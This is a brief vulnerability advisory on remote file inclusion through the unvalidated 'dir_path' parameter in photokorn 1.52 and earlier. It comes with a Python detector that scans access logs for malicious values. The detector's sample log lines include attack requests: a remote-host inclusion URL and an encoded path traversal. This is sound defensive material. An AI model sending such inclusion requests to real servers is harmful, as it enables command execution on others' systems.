Multiple vulnerabilities have been identified in photokorn, which could be exploited by attackers to execute arbitrary commands. These flaws are due to input validation errors in various scripts (e.g. "includes/cart.inc.php" and "extras/ext_cat.php") that do not validate the "dir_path" parameter, allowing remote attackers to include malicious scripts and execute arbitrary commands with the privileges of the web server.
Vulnerable Products
Vulnerable Software: photokorn version 1.52 and prior
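A detection sketch for the flaw described in this advisory, added here as an example and not taken from the advisory or from the photokorn code: it scans web-server access logs for requests whose "dir_path" query parameter is a URL, a stream wrapper, or a path that escapes the application directory. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request part of an Apache/nginx "combined" log line: "METHOD target PROTO"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"')
# A leading scheme or wrapper prefix (http:, ftp:, php:, data: ...)
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.I)

def classify_dir_path(value):
    """Return a reason string if a dir_path value is not a plain relative path."""
    # Decode repeatedly so double-encoded values are judged in their final form.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    if SCHEME_RE.match(value) or value.startswith("//"):
        return "url-or-wrapper"
    if "\x00" in value:
        return "null-byte"
    if value.startswith(("/", "\\")) or ".." in value.replace("\\", "/").split("/"):
        return "path-escape"
    return None

def scan(lines):
    """Yield (line_number, script_path, reason) for every flagged request."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # malformed or non-HTTP line
        target = urlsplit(match.group("target"))
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name.lower() != "dir_path":
                continue
            reason = classify_dir_path(value)
            if reason:
                yield number, target.path, reason

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?cat=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /includes/cart.inc.php?dir_path=http%3A%2F%2Fhost.example%2Fx HTTP/1.1" 200 312 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /extras/ext_cat.php?dir_path=..%252F..%252Ftmp HTTP/1.1" 200 298 "-" "-"',
    '192.0.2.44 - - [01/Jan/2024:10:01:00 +0000] "GET /extras/ext_cat.php?dir_path=gallery HTTP/1.1" 200 4100 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so a "dir_path" value sent in a POST body or cookie is outside what this check can see.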